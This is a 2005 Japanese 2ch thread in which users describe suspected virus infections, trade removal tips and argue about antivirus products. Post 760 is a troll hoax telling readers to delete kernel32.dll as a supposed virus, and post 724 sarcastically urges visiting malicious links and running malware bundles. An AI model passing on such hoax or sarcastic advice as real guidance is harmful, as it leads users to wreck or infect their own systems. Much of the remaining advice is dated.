680 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 21:16:03 ]: ＤＬしたexeを起動させたら、ウインドウが沢山開いてその後にハエやゴキブリが画面上を動き回ったりします。
これってウイルスなんでしょうか？もし解決策があるなら教えて下さい。
681 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 21:27:27 ]: オンラインスキャンでウイルス名を判別セヨ
682 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 21:41:58 ]: >>680
そんなジョークソフトがあったはず。
確か、ゴキやハエを全部叩き潰さんとダメってやつ。
とりあえず、スキャンしてみろ
683 名前：682 mailto:sage [2005/04/20(水) 21:43:41 ]: wwwi.netwave.or.jp/~jin21/index_048.htm
これだ。
684 名前：680 mailto:sage [2005/04/20(水) 21:54:45 ]: すみません、それでした……無知な自分が恥ずかしいですよ……マジで……
685 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 21:58:33 ]: ウィルスとかじゃなくてよかったと思った方がいいぞ。
686 名前：680 mailto:sage [2005/04/20(水) 22:04:26 ]: そうですね、でもShiftキー押しても設定出てこないし最初に出てくる大量のウインドウは何なんだろう？
ＤＬしたアプリも削除できないんですよね？
687 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 22:08:30 ]: >>686
そのツールにある、
「嘘フォーマット」ってやつだと思う>ウィンドウ

設定出すのはShift、終了はCtrlらしいけど、
ReadMeに1秒以上押せって書いてあるから、単に押しただけじゃダメなんじゃないか？
終了させた後は普通に捨てたらいいはず
688 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 22:50:48 ]: g1winners俺にもｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━!!!!!
689 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 23:12:08 ]: SASSERと同じ症状でPCがシャットダウンされちゃったよ
xpでSP2、アンチウイルスもインストしてたのになんで？
これっていま出来たて？
690 名前：名無しさん＠お腹いっぱい。 [2005/04/20(水) 23:17:01 ]: >>689
おーすまん、とりあえずテンプレはるよ
【使用OS】XP　SP2
【WindowsUpdateしてるか】やってます
【AntiVirusは何を使っているか】Norton
【ちゃんとUpdateしてるか】やってます
【症状を具体的に、分かる限りすべて書く】
SASSERと同じ症状でPCがシャットダウンされちゃったよ
xpでSP2、アンチウイルスもインストしてたのになんで？
これっていま出来たて？

【何をしたらそんなことになったのか】
ネットスケープでメールを受信した直後。なんかえらーが出てその後おなじみの
タイマー作動。日本語で表示されてたよ。
【これまでにとった措置】
ネットワーク隔離
ハードディスクを取り外して別のPCで検索かけようかと思ったけど、出来たて
ホヤホヤならウイルスが拡散するのではと思い・・・
とりあえず外して待機中
691 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/20(水) 23:55:06 ]: g1winners一杯ｷﾃﾀ━━━━(ﾟ∀ﾟ)━━━━ !!!!!
692 名前：527 mailto:sage [2005/04/21(木) 00:13:33 ]: >>672　ありがとうございした。きれいに削除できました。
このソフトすごいですね。

以前はこんな感じになってました↓
ttp://strawberry.web-sv.com/cgi/up/ia/up9616.jpg
693 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 00:17:23 ]: >>690
その後、
最新定義ファイルの入った別のPCに接続してウィルス検索してもヒットせず・・・
これってどういうこと？
ちなみにプロバイダのウイルス検索も通過してきたよ。

それにしても困ったなぁ
694 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 00:32:48 ]: >>693
ドライブまんまるスキャンだと思うけど、もって行ったシステムの管理者権限アカウントに
そのドライブへのアクセス権はあるんだろうな。
もしもなければ、ウィルスなどがいても、
そのユーザー権限で起動しているスキャンプロセスは、
全くそのドライブ内にはアクセス出来ない事になる。
695 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 00:35:54 ]: >>693
ユーザーフォルダをプライベート設定にして使用していなかったか？
そうだとすると、
そのDocuments and Settingsのフォルダ内はスキャンすら出来ないことになる。
696 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 00:36:00 ]: 同じアカウント名つかってるし、権限も最高。多分大丈夫

んで、さっきは再起動してもログインの手前で「ライセンスがどうのこうの」って
先に進めず、そこで切り離したんだが、その後もう一度やったらログインできた。

あれは何だったの?SASSERやブラスターででてくる赤い×マークとタイマーで
カウントダウンがはじまったよ。

とりあえずHDDを再セットして検索中です。
697 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 00:38:26 ]: >>696
ﾀﾞﾒﾀﾞｺﾘｬ
プライベート設定してただろ？
698 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 00:47:18 ]: 別PCでも、DandSのフォルダはちゃんと覗けていましたよ。その
下位にあるユーザー名がついたフォルダも。

2.5インチの外付ケースにいれてUSBで接続して検索しました。

いまとりあえず元の環境で再検索中。とりあえずDandSフォルダは通過した
模様。ウィルスヒットなし。
なぞは深まるばかり・・・
699 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 01:00:51 ]: >>698
それならウィルスじゃなくてネットワーク関連のプログラムのせいで
svchost.exeにエラーが発生して、落ちた可能性もある。
当然RPCサービスにエラーが発生すれば、ウィルスじゃなくても
サービス設定で再起動になっているから、再起動する。
700 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 01:05:49 ]: >>699
レスサンクス
っつーことは仕様?
あのカウントダウンはXPに元々あるのかな？
それなら安心だが

いまトレンドマイクロ社のオンラインスキャン実行中
701 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 07:04:49 ]: なんか昨日Windowsの起動に必要などっかのファイルが破損してるとかで
リカバリを余儀なくされたよorz。今となってはウイルスかどうかもわからん。
702 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 10:39:03 ]: >>696
俺も数日前、同じ状態になり、Googleなどで検索しても解決
できなかったためリカバリしたよ。
多分、常駐しているアプリケーション同士がぶつかったとか
Windowsの中の問題ではないだろうか。
原因が特定できなかったのが残念だ。
703 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 11:21:06 ]: >>702
20日付のnortonのウイルスファイルアップデートをして再検索しても
みつからず。いったい何だったんだろうなぁ。
とりあえず今は普通に使えています。

そろそろPC乗り換えようと考えてから、PCにはトラブルがよく起こる
PCにはわかるのかなぁ、俺の気持ち(笑)
704 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 13:57:53 ]: 浮気しそうだと思ってスネてるんだよ
705 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 15:39:18 ]: 結局>>655のメールって何だったんですかね？
俺のPCにも来てたけど、昨日の１：４９以降音沙汰無いんで
無視しておｋ？
706 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 15:58:49 ]: >>705
おれんとこにも来た。調べてみたら、送信してた（ｗ
ルーターの送信履歴を取って初めて分かった。
まだウィルスとしてひっかからないウィルスあるだなぁ～て
ちょっと感心。
707 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 19:24:25 ]: www.canon-sol.co.jp/security/v_b/v_b.html
「Virus Bulletin」の調査によるとNOD32,カスペ,ノートンが（・∀・）ｲｲ!!みたいだな。

バスターﾀﾞﾒﾎﾟ

まぁ軽さという点も含めてNOD32が無難なとこか?
708 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 21:36:56 ]: 俺は常駐シールドの性能でマカフィーを使っている
対応ウィルス数が多いのを謳っている製品でも、
実際はメジャーどころの亜種ウィルスをスルーするし、
カバー率なんてあてにはならない
滅多に置いてないウィルスを発見するのよりも、
メジャーどころのウィルス網羅率100％の方が俺にとってはいい
709 名前：名無しさん＠お腹いっぱい。 [2005/04/21(木) 21:42:50 ]: 【使用OS】 XP HOME
【WindowsUpdateしてるか】自動アップデート
【AntiVirusは何を使っているか】ウィルスバスター
【ちゃんとUpdateしてるか】自動アップデート
【スキャンした結果（ウイルス名・発見場所）】発見できず
【別のオンラインスキャンしたならその結果は】まだやってない
【症状を具体的に、分かる限りすべて書く】 Outlook Expressを起動して、メールを受け取ろうとするとウィルスバスターが緊急警告をだします。
警告内容はPOP3 USERS FORMAT STRING EXPLOIT ATTEMPTから攻撃を受けました。
ネットワークウィルス攻撃を受けています。

その後、しばらくまっているとPOP3サーバーが60秒の間、応答しません。あと60秒待ちますか？と出ます。

【何をしたらそんなことになったのか】メールを受け取ろうとしたら。
【これまでにとった措置】手動ウィルス検索ですべてのファイル検索
【その他の質問】
710 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 23:01:10 ]: >>708
マカフィーはユーザー無視のこういうことする会社
↓
ttp://ton.2ch.net/sec/kako/994/994010282.html
23 名前：おいおい投稿日： 2001/08/15(水) 12:54
　ウイルス定義ファイル（DATファイル）をアップデートしたら、
　SCAN32 のページ違反です。モジュール : MCSCAN32.DLL、アドレス : 017f:004d103f とエラーが出てしまい、使えなくなってしまった。
　サポートによると、プレインストール版はエンジンのアップデートの権利がないので、解決したければ、優待版を買え！だとさ。
　ttp://www.nai.com/japan/pqa/aMcAfeeDatFile.asp?ancQno=DT01080901&ancProd=McAfeeDatFile
　DATを更新させといて、使えなくするなんて、なんか姑息じゃないか？
　使えなくなるんだったら、DATの更新を出来なくしておくとか、せめて警告するとか。
　６月に更新したDATのままでいいから、せめて、それに戻せればいいけど、出来ないみたいだし。
　古いプレインストール版の人は、もうDATの更新しないことだよ。単に使えなくなるだけだから。
711 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/21(木) 23:21:30 ]: フリーソフトで充分
712 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 01:20:29 ]: www.canon-sol.co.jp/security/v_b/v_b.html
「Virus Bulletin」の調査によるとNOD32,カスペ,ノートンが（・∀・）ｲｲ!!みたいだな。

バスターﾀﾞﾒﾎﾟ

まぁ軽さという点も含めてNOD32が無難なとこか?
713 名前：名無しさん＠お腹いっぱい。 [2005/04/22(金) 02:26:08 ]: あの、ちょっとお伺いしたいのですが、
『最大化＆最小化』のところや、『閉じる』のところを始め、
矢印のところが変な記号や数字に変わってしまいました。

ウイルススキャンしても何も出ないのですが、これはウイルスなのでしょうか？

スレは読んだのですが、載ってなかったのもので…
714 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 03:00:41 ]: >>713
98/Me系ならウイルス云々ではなくWindowsのFAQ。
ttp://homepage2.nifty.com/winfaq/fontstrouble.html
715 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 03:58:24 ]: >>713
>>714の言う通り、Winfaqもそうだし、

Windows9x(95/98)・Me質問スレッド Part47
pc8.2ch.net/test/read.cgi/win/1112788548/
ここ見る事を勧める。
716 名前：名無しさん＠お腹いっぱい。 [2005/04/22(金) 08:24:11 ]: >709
自分も全く同じ事が起きています。
ウイルスバスターのＨＰへ行ってもウイルス名書いてないし
メールが受信できなくて困っています。
なんなんでしょう
717 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 09:43:44 ]: >>716
バスタースレにも出てるけど、ＦＷを切れば受信できるようになる

前回の誤検出といい、バスターだめぽ
718 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 10:01:50 ]: >717
㌧です
ﾊﾞｽﾀｰだめぽorz
719 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 10:21:26 ]: >>710
特にXPだと、
ウィンドウズアップデートで頻繁にOSの構成ファイルが更新されるので、
セキュリティソフトなど以前のモジュールは正常に動作しなくなる事が多い。
ほとんどは、ユーザーの無知に起因しているんだよね。
それだって更新モジュールが提供されているのに、
そのユーザーは知らないようだ。

>2001/8/9
でも俺は、こんなバンドル版をいつまでも使い続けようとする方が
よっぽど姑息だと思うぞ！
720 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 11:01:52 ]: www.canon-sol.co.jp/security/v_b/v_b.html
「Virus Bulletin」の調査によるとNOD32,カスペ,ノートンが（・∀・）ｲｲ!!みたいだな。

バスターﾀﾞﾒﾎﾟ

まぁ軽さという点も含めてNOD32が無難なとこか?
721 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 11:39:29 ]: >>720
あちこち貼って誰かうなずいてくれた奴はいるのか？
722 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 11:42:29 ]: >>721
あちこちに貼れば貼るほど嘘くさい罠
723 名前：名無しさん＠お腹いっぱい。 [2005/04/22(金) 12:28:53 ]: www.canon-sol.co.jp/security/v_b/v_b.html
「Virus Bulletin」の調査によるとNOD32,,ノートンが（・∀・）ｲｲ!!みたいだな。

www.canon-sol.co.jp/security/v_b/pdf/01_VB_Jun03_VBJP.pdf
10/12ページから11/12ページ
Kaspersky Anti-Virus 4.0.5.37のテストにあたって高い検出率が期待されたが、その通り
【W32/Etapのサンプルを１つ見逃した】だけだった。
ところがこのすばらしい【検出率はクリーンテストセットに対する誤検出で台無しに】なってしまった。
このファイルがシステムをリブートさせるタイプの【トロイの木馬として誤検出されてしまった】のだ。
このミスのために今回はVB100%アワードを逃す結果となった。

www.canon-sol.co.jp/security/v_b/pdf/03_VB_Aug03_VBJP.pdf　７／１２ページ
www.canon-sol.co.jp/security/v_b/pdf/09_VB_Feb04_VBJP.pdf　７／１２ページ
の２つのテストでも検出率は

NOD32>>>>カスペ

「Virus Bulletin」のアワード取得回数
www.virusbtn.com/vb100/archives/products.xml?eset.xml
www.virus.gr/english/fullxml/default.asp?id=67&mnu=67
NOD32>>>>カスペ

まぁ軽さという点も含めてNOD32が無難なとこか
724 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 13:15:53 ]: >>723
くっだらねえ
そんな情報を引っ張り出さないと、自分でどれがいいかの判断も出来ないのかよ
いろんなのをインストールして、
やばいリンクを晒しているサイトに行って、
全部踏んでみれば、どのソフトを他人に薦めればいいのかくらい判断出来るよな
また.exeファイルでの感染状況を調べたかったとしたら、
詰め合わせファイルをダウンロードして実行してみればわかる。
725 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 13:31:19 ]: 画面が急に暗くなるのってなんというウィルスなんでしょうか？
726 名前：名無しさん＠お腹いっぱい。 [2005/04/22(金) 14:18:09 ]: mellpoxというプログラムをご存知ないですか？
727 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 14:38:54 ]: >>726
mellpon じゃないの？
mellponなら山田だ
728 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 14:57:18 ]: >>725
単にディスプレイの寿命では？
729 名前：726 [2005/04/22(金) 15:05:09 ]: >>727
山田でした
730 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 19:24:19 ]: えっと、曲も何も再生してないのに何か外人の英語が聞こえてるんですけど。
スピーカーを最大近くにすると聞こえてます。
後ろで曲とかも流れるし外国のラジオみたいなんですけど、こんなウイルスあるんですか？ｗ
731 名前：名無しさん＠お腹いっぱい。 [2005/04/22(金) 19:41:15 ]: ウイルスにも戒告にも懲りず役所でまたエロサイト
news19.2ch.net/test/read.cgi/news/1114160261/

職場のパソコンでアダルトサイトを閲覧しコンピューターウイルスに感染させたとして、
戒告処分を受けた山口市の部次長級ら職員２人が、再び閲覧してウイルス感染を引
き起こしていたことが２２日、分かった。
山口市は２人をあらためて減給処分にし、別に閲覧しウイルス感染させた課長級の職員
を戒告処分とした。
732 名前：名無しさん＠お腹いっぱい。 [2005/04/22(金) 19:58:22 ]: >>730 スピーカから聞こえるウィルスなんて聞いたことない。何かが混線して混ざったんじゃない？携帯電話がなるとスピーカから変な音したりするんだしね。
733 名前：名無しさん＠お腹いっぱい。 [2005/04/22(金) 20:54:46 ]: win2000インストしてサービスパックDLしようとISDNを１０分ほどつなげとくと有無を言わせずトロイに感染する時代になったのか。
それでもなんとかサービスパック適用してノートン先生で駆除もしたが、今度は先生が検出しないウイルスに感染してる。多分トロイ。。。
さまざまな外国の方々からのアクセスが絶えない。
RUNとかRUN SERVICEにあるウイルスのレジストリキー消しても不死鳥のごとくキーごと復活
もうだめだ・・・
734 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 21:03:43 ]: >>733
・M$は以前サービスパック入りのCDを無料で配っていた…今もやっているのかな？
・必要なパッチはローカルにﾀﾞｳｿしてCDにでも焼いておく
・ファイアーウォールソフトをインスコしてからネットに繋ぐ
735 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 22:57:35 ]: >>731
クオリティタカスｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
736 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/22(金) 23:53:07 ]: >>732
混線ですか・・そんなのありえるのか・・
737 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 00:26:57 ]: >>716さん

ホント、ありがとうございました。
直りました。

バスターだめだな・・・・
738 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 00:27:52 ]: ああーすいません。717さんでした。
739 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 01:49:34 ]: 動画ファイルに感染するウィルスってあるのかなぁ。
画像ファイルはklezがあったけど。

素朴な疑問。
740 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 01:52:03 ]: >>739
動画ファイルで感染ってのはあるみたいだけど
japan.cnet.com/news/sec/story/0,2000050480,20074940,00.htm
741 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 02:05:41 ]: 「RealPlayer」などにバッファオーバーフローの脆弱性
ttp://www.itmedia.co.jp/enterprise/articles/0504/20/news105.html

WMVファイルを装うトロイの木馬、P2Pソフトで流行中～DRMを悪用
ttp://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html
742 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 02:10:24 ]: W32.Pinfiというウイルスに感染してしまいました。
Program Files内のソフトが全て使えません。
駆除方法を教えてください。宜しくお願いします。
743 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 02:17:33 ]: >>742
ウィルス対策ソフトとか入ってるのか？
後、そのウィルス名でぐぐれば駆除方法出てる
744 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 02:19:40 ]: 【使用OS】 Windows XP
【WindowsUpdateしてるか】月に1度程度
【AntiVirusは何を使っているか】ノートン
【ちゃんとUpdateしてるか】週に1度程度
【ウイルス名】Trojan. Dropper
【症状を具体的に、分かる限りすべて書く】マシンのレスポンスが劇的に遅くなりました…。

海外のサイトをフラフラと流浪した上で
PCを再起動させると、マシンのレスポンスが劇的に遅くなってしまいました。
様々なスキャンツールを使った結果、
一様に「system32」フォルダ内の「winIogon.exe」が上記、トロイに感染していると出ました。
このファイル名でググってみると
「普段は、system32フォルダ内にあるファイルだが、
そうでない場合はウィルス、トロイ、スパイウェアである可能性がある」とのことですが
当方の状態は、感染している「winIogon.exe」は「system32」内に存在している為、
「重要なファイルなのでは…」と削除に踏み切れないでおります。
ノートン先生も「修復出来ない」「アクセスが拒否される」と匙を投げている為
こちらにお力添えを戴きに参りました。
このファイルは削除してしまっても良いのでしょうか？
そうでない場合、対処法をお導き頂けませんでしょうか？
よろしくお願い致しますm(_ _)m
745 名前：742 [2005/04/23(土) 02:25:19 ]: >>743
ウイルス対策ソフト等はなにも入れてません…
書き込む前にぐぐってみたのですが、有料ソフト
を使っての駆除方法しか見つけられませんでした。
駆除ソフトも全く持っていませんが、今すぐ駆除できるのでしょうか。
746 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 02:30:38 ]: >>745
つい最近発見されたウィルスではないから、
フリーのアンチウィルスソフトでも多分対応してるだろ。
どうしても無理なら、有料ソフトのお試し版落として駆除すればいい
747 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 02:32:11 BE:118438496- ]: >>744
WinLogon.exeは重要なファイルだけど。
WinIogon.exeは多分関係ない。
IとLは違うｗｗｗｗ

修復できないのは現在プロセスが動いているから。

もう1回ぐぐってこいｗｗｗｗ
system32にWindowsのシステムファイルと似たようなファイル名を作る
のはいくらでもあるぞ。
748 名前：744 mailto:sage [2005/04/23(土) 02:39:14 ]: >>747さん

即レス、有難うございます！
本当ですね…。
仰られた通り、自分が閲覧していたのは「win【L】ogon.exe」の情報でした＾＾；
ググる前に、「win【I】ogon.exe」のプロパティを確認したところ
作成日が2002年ということで、出荷以前に組まれたファイルだと思っていたのですが
それは「win【L】ogon.exe」の作成日と全く同じでした。
紛らわしくさせる為に、「win【L】ogon.exe」の更新情報をコピーしているんですかね？
セキュリティに関しては「ド」の付く素人ですので
文章に曲解表現がありましたら、申し訳ないです。
749 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 03:20:57 ]: winIogon.exeは外国の掲示板でも話題になてるmalewareみたいですね。
セーフモードで削除できますよ。
750 名前：744 mailto:sage [2005/04/23(土) 04:18:46 ]: >>747さん
>>749さん

削除したところ、動作の不具合も無くなりました。
お騒がせしてすみませんでした。
有難うございます！
751 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 16:02:07 ]: 【使用OS】XP
【WindowsUpdateしてるか】ひと月に一度程
【AntiVirusは何を使っているか】ウイルスバスター2005
【ちゃんとUpdateしてるか】ほぼ毎日
【スキャンした結果（ウイルス名・発見場所）】PCの動作が重たく、バスターを起動出来ないためスキャンしていません。
【別のオンラインスキャンしたならその結果は】行なっていません。
【症状を具体的に、分かる限りすべて書く】昼過ぎにPCを起動したら、すごく動作が遅くなっていて、アプリケーションを開くことが出来ません。タスクマネージャー？を開いたら、CPU使用率が100％になっています。
【何をしたらそんなことになったのか】午前は普通に使うことが出来て、ヤフー、2chを閲覧しました。その他は特に何もやっていないと思います。それで昼過ぎに再度立ち上げたらこの症状があらわれました。
【これまでにとった措置】ウイルスを検索しようと思い、バスターを立ち上げようとしていますが、起動してくれません。セーフモードというものを行なってみたのですが、何をすればいいのかわかりません…。
【その他の質問】過去ログを見れば何かわかるのかもしれませんが、PCが機能しないため、携帯でこのスレを閲覧し、書き込んでいます。私の説明が不十分な点もあるかもしれませんが、ウイルスなどに関する知識がないためご容赦くださいm(__)m
752 名前：751 [2005/04/23(土) 16:05:37 ]: 751です。不安でしたため、先に質問をさせていただきましたが、これからこのスレを一通り見てみますm(__)m
753 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 16:05:50 ]: >>751
pc8.2ch.net/test/read.cgi/sec/1114237392/
ここ覗いてみて、解決法書いてたはずだから
754 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 16:06:37 ]: >>751
「ウイルスバスター2005 Part21」スレを読め。
755 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 16:31:43 ]: 753
754
ありがとうございます。
まさかウイルスバスターが原因だったとは…
ノートンに変えます…
756 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 16:33:05 ]: マカフィーが信頼性のわりに安価でいいyo。
757 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 16:47:21 ]: おいおいｗ
758 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 18:04:28 ]: ウイルスバスタースレは祭り状態だな
759 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 18:36:54 ]: >>758
まぁ、OSは別として、最も信頼性・安定性を求められる類のソフトですからねぇ、
しょうがないでしょうねぇ。。。。。
かなり、バスター使ってない香具師も混ざってると思いますがｗ
俺はSP1のままなんで難を逃れました。
760 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 19:19:13 ]: 新種のウィルスが発見されました。
このウィルスはネットワークを介して進入して来るので防ぎようがありません。
感染を確認する方法は、ファイルの検索を使ってkernel32.dllというファイルを
検索します。
見つかり次第早急に削除して下さい。
KERNEL32というウィルスです。
761 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 19:35:21 ]: >>760
('A`)…ﾂﾏﾝﾈ…('A`)ｼ
762 名前：名無しさん＠お腹いっぱい。 [2005/04/23(土) 20:49:28 ]: 【使用OS】 ×Ｐ
【WindowsUpdateしてるか】していない。
【AntiVirusは何を使っているか】ノートン２００３
【ちゃんとUpdateしてるか】毎日している。
【スキャンした結果（ウイルス名・発見場所）】なし
【別のオンラインスキャンしたならその結果は】ウイルスバスター　結果なし
【症状を具体的に、分かる限りすべて書く】夜７～８時に、マウスが奇妙な動きをします。
　　　　　　　　　　　　　　　　　　　　勝手にスタートや画面の端に移動します。　　　　　　　　　　　　　　　　　　　
【何をしたらそんなことになったのか】ヤフーのインターネット設定時、ノートンを解除した。
【これまでにとった措置】ＫＥＬＺ駆除ツールを使用したが効果なし。

【その他の質問】１　ウイルスでしょうか？
　　　　　　　　２　バックアップＣＤを今から作って、再インストした方がいいでしょうか？
　　　　　　　　ご教授おねがいします。　
763 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 20:56:01 ]: >>760
　 , ,_
( ﾟ∀ﾟ)
ノヽノヽ　=3 ﾌﾟｩ
　　くく
764 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 20:56:38 ]: >>762
SP2なら、SP2の不具合
765 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 23:10:35 ]: 【使用OS】 WinNY
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】 NOD32
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】 antinny.a
【別のオンラインスキャンしたならその結果は】 antinny.a antinny.g
【症状を具体的に、分かる限りすべて書く】わからん
【何をしたらそんなことになったのか】わからん
【これまでにとった措置】 NOD32で駆除
【その他の質問】 nyやっていないのにキンタマに感染するの？
766 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 23:13:44 BE:65799656- ]: >>765
>【使用OS】 WinNY
767 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/23(土) 23:22:21 ]: ﾈﾀにしても弱すぎるｗ
768 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 00:10:44 ]: >>764
なるほど
769 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 01:54:17 ]: 【使用OS】 Me
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】ウイルスバスター２００５
【ちゃんとUpdateしてるか】しています
【スキャンした結果（ウイルス名・発見場所）】 windows\system\xxbfs.exeにBKDR_SUB7.22A
【別のオンラインスキャンしたならその結果は】していません
【症状を具体的に、分かる限りすべて書く】 Bit Defenderでもスキャンして見つかったのですが
　　　　　　　　　　　　　　　　　　　　「xxbfs.exeをwindowsが使っている」ので駆除できません。
【何をしたらそんなことになったのか】心当たりがありません。
【これまでにとった措置】トレンドマイクロのHPに出ていた対応を試みましたがだめでした。
【その他の質問】windowsを入れ直した方がいいでしょうか？
770 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 02:09:28 ]: >>769
レジストリの値を削除した後、再起動してスキャンした？
771 名前：YOSHI [2005/04/24(日) 02:28:06 ]: １００パーうぃるす！！！スキャンできません！！ＭＸとかやってない？
最後には真っ赤になり壊れる
772 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 03:39:08 ]: オンラインスキャン　ノートン/バスター　両方とも使って、PC内のノートン2002も使ってウイルス検出をしたのですが
ウイルスは出てきませんでした。
これはとりあえず安心していいのでしょうか。
773 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 03:50:32 ]: >>772
ノートン2002って更新できるのかな？ノートン使ってないからわからんけど。
一応安心していいだろ。
あとスパイウェアのスキャンもしたほうがいい。
やる気があるならトロイ駆除用のソフトでもやってみたらいい。
774 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 03:53:19 ]: >>772-773
2002は今年１０月までしか更新できないよ。
775 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 05:26:54 ]: >>758
NOD32にレジストリを壊された時にしんどかったから、バスターに乗り換えたのに・・・・・・・・・・・・・・。orz

●NOD32にレジストリを破壊してOS再インストールが必要になる重大バグが発生。
・登録済みのアプリが強制抹消される問題
・Windows シャットダウン時にブルースクリーンになる問題
（公式ホムペのトラブル詳細　canon-sol.jp/product/nd/v20008.html ）

ま、バスターの更新料を割り引くとかなんかサービスしてくれれば、こういうトラブルもかえって得かな？
今度からしっかり対策してくれれば問題ないし。
776 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 05:39:05 ]: >>775
俺の歴史

鉄壁がおかしくなった　→　ノートンが証明書がどーたらになった　→　バスターが１００％
777 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 07:31:16 ]: 無限ループだけか。NOD32の過ちには到底及ばないな
778 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 08:01:43 ]: >>776
勝った！

バスタークラッシュ　→　マカフィーブルースクリーン　→　ノートンハング　→　ＮＯＤ32レジストリクラッシャー　→　バスター１００％

どうせいっちゅーの！
779 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 08:07:19 ]: >>778
フリーの使えば・・
780 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 08:36:17 ]: >>776 >>778
頼むから藻前らは俺が使ってるやつに乗り換えるなよ　疫病神めw
781 名前：778 mailto:sage [2005/04/24(日) 08:52:09 ]: 仕方ねーな。
次はマカフィーにしておくか。一周ってことで（ｗ
782 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 16:42:08 ]: バスターはトロイな。
783 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 20:19:37 ]: >>782
